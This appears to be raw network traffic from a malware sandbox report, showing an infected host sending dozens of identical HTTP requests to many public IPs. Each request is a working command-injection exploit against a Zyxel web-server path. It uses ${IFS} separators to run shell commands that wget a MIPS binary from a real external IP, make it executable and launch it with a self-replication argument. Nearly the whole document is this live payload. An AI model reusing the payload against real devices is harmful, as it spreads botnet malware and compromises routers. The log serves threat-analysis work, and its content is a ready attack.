                                            Feb 2, 2024 06:21:11.608362913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4063192.168.2.1533446196.131.25.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608392954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4064192.168.2.1544774116.75.25.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608412981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4065192.168.2.1550118108.90.170.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608464956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4066192.168.2.155715081.249.247.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608489037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4067192.168.2.1539220197.224.193.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608544111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4068192.168.2.154819637.82.10.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608597040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4069192.168.2.1545178182.122.77.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608623981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4070192.168.2.155109477.122.154.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608681917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4071192.168.2.1535386131.23.249.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608711958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4072192.168.2.155509899.198.110.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608737946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4073192.168.2.1551526185.252.159.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608769894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4074192.168.2.1541260212.235.212.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608813047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4075192.168.2.154873879.46.17.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608843088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4076192.168.2.1537948136.77.88.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608860970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4077192.168.2.1549096191.184.99.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608896017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4078192.168.2.153623896.217.85.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608935118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4079192.168.2.1552616200.164.121.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608978987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4080192.168.2.1552082221.207.118.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609025955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4081192.168.2.1560174138.224.150.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609071970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4082192.168.2.1546334159.238.221.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609101057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4083192.168.2.1533576100.157.117.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609129906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4084192.168.2.153760664.231.24.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609158993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4085192.168.2.1546010184.80.121.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609198093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4086192.168.2.1540420203.242.175.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609246969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4087192.168.2.153315648.227.132.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609292030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4088192.168.2.154917891.156.52.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609338045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4089192.168.2.1545150204.208.90.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609385967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4090192.168.2.153364657.65.255.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609421015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4091192.168.2.1539316143.25.0.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609455109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4092192.168.2.1555148189.228.211.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609479904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4093192.168.2.1536962146.108.96.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609513998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4094192.168.2.1533242169.198.131.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609574080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4095192.168.2.1550192150.48.187.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609599113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4096192.168.2.1551876114.20.166.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609641075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4097192.168.2.1551946189.201.167.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609689951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4098192.168.2.155066225.203.69.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609735966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4099192.168.2.154095283.233.187.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609771967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4100192.168.2.153531473.19.176.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609807968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4101192.168.2.1539774129.174.5.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609841108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4102192.168.2.155327093.209.14.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609906912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4103192.168.2.1556658110.181.83.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609930038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4104192.168.2.155195042.76.110.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.609965086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4105192.168.2.1548758132.221.51.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610006094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4106192.168.2.154644068.78.255.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610027075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4107192.168.2.1541522162.119.138.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610050917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4108192.168.2.154129691.158.49.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610111952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4109192.168.2.153692834.107.161.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610136032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4110192.168.2.1538016103.2.92.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610176086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4111192.168.2.153349488.253.172.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610218048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4112192.168.2.1535396132.19.231.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610244036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4113192.168.2.1538374212.188.225.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610292912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4114192.168.2.153362642.67.64.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610318899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4115192.168.2.1538870167.142.156.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610362053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4116192.168.2.153571064.209.188.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610387087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4117192.168.2.1540460184.93.80.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610443115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4118192.168.2.1551022179.77.113.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610462904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4119192.168.2.1559702133.233.217.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610502005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4120192.168.2.1551294166.94.15.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610548019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4121192.168.2.1534238107.7.126.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610574961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4122192.168.2.155078493.206.251.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610621929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4123192.168.2.1541486155.5.174.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610651970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4124192.168.2.1556604128.178.86.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610701084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4125192.168.2.154865853.93.132.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.610735893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4126192.168.2.154899618.116.244.118443
                                            TimestampBytes transferredDirectionData
